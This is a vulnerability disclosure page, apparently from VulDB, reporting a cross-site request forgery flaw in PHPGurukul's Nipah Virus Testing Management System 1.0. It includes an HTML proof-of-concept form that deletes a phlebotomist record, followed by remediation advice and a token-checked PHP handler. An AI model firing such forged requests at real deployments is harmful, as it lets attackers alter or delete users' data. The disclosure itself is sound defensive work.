Submit #246354: PHPGurukul Nipah Virus Testing Management System 1.0 Cross Site Request Forgery: Information

Title: PHPGurukul Nipah Virus Testing Management System 1.0 Cross Site Request Forgery
Description: Hello there, My name is Dhabaleshwar Das, a cyber security researcher. I recently found a CSRF vulnerability in Nipah virus (NiV) – Testing Management System. Here is the PoC below:

Bug Description: A Cross Site Request Forgery (CSRF) vulnerability in the "manage-phlebotomist.php" endpoint of PHPGurukul Nipah virus (NiV) – Testing Management System 1.0 allows attackers to delete a phlebotomist via a crafted HTML request.

Steps to Reproduce:

# Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in PHPGurukul Nipah virus (NiV) – Testing Management System
# Date: 02-12-2023
# Exploit Author: dhabaleshwardas
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: firefox/chrome/brave
# CVE :

To reproduce the attack:

1- Head to the http://localhost/nipah-tms/manage-phlebotomist.php endpoint.
2- Here you can see the phlebotomist name as "CSRF Test". We'll try to delete that using the HTML code we have written.

    <html>
    <!-- CSRF PoC - by Dhabaleshwar Das -->
    <body>
      <script>history.pushState('', '', '/')</script>
      <form action="http://localhost/nipah-tms/manage-phlebotomist.php">
        <input type="hidden" name="pid" value="175" />
        <input type="hidden" name="action" value="delete" />
        <input type="submit" value="Submit request" />
      </form>
    </body>
    </html>

3- We'll then execute this HTML code and we see that the record has been deleted successfully.
4- This shows that the endpoint "manage-phlebotomist.php" is vulnerable to a CSRF attack.
5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records.

Remediation:

1- Implement anti-CSRF tokens (also known as CSRF tokens or synchronizer tokens) in web forms. These tokens are unique per session and are embedded in the HTML form. The server validates the token with each form submission, ensuring that the request is legitimate.
2- Set the SameSite attribute on cookies to control when they are sent with cross-origin requests. This helps mitigate the risk of CSRF by preventing the automatic inclusion of cookies in cross-site requests.
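A hardened delete handler for an endpoint like manage-phlebotomist.php that applies both remediation points (a per-session synchronizer token checked on POST, and a SameSite session cookie). This is an added example, not PHPGurukul's code; the mysqli connection $con, the $row variable and the table/column names tblphlebotomist/ID are assumptions.

```php
<?php
// Added example (not PHPGurukul's code): a hardened delete handler for a page
// like manage-phlebotomist.php. $con, $row and the table/column names are assumptions.
session_set_cookie_params([
    'samesite' => 'Strict',   // browser omits the session cookie on cross-site requests
    'httponly' => true,
    'secure'   => true,       // assumes the app is served over HTTPS
]);
session_start();

// Issue one synchronizer token per session.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_token_is_valid(array $post, array $session): bool
{
    if (empty($session['csrf_token']) || empty($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// State-changing actions are accepted only via POST and only with a valid token,
// so a GET request carrying ?pid=...&action=delete never reaches the DELETE.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'delete') {
    if (!csrf_token_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $pid = filter_input(INPUT_POST, 'pid', FILTER_VALIDATE_INT);
    if ($pid === false || $pid === null) {
        http_response_code(400);
        exit('Bad pid');
    }
    $stmt = $con->prepare('DELETE FROM tblphlebotomist WHERE ID = ?');
    $stmt->bind_param('i', $pid);
    $stmt->execute();
}
?>
<!-- The delete form carries the token; a cross-site page cannot read it. -->
<form method="post" action="manage-phlebotomist.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES) ?>">
  <input type="hidden" name="pid" value="<?= (int) $row['ID'] ?>">
  <button type="submit" name="action" value="delete">Delete</button>
</form>
```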
Source: https://github.com/dhabaleshwar/niv_testing_csrf/blob/main/exploit.md
User: dhabaleshwar (UID 58737)
Submission: 02/12/2023 06:09 (3 years ago)
Moderation: 02/12/2023 08:34 (2 hours later)
Status: Accepted
VulDB Entry: 246640 [PHPGurukul Nipah Virus Testing Management System 1.0 manage-phlebotomist.php pid cross site request forgery]
Points: 20
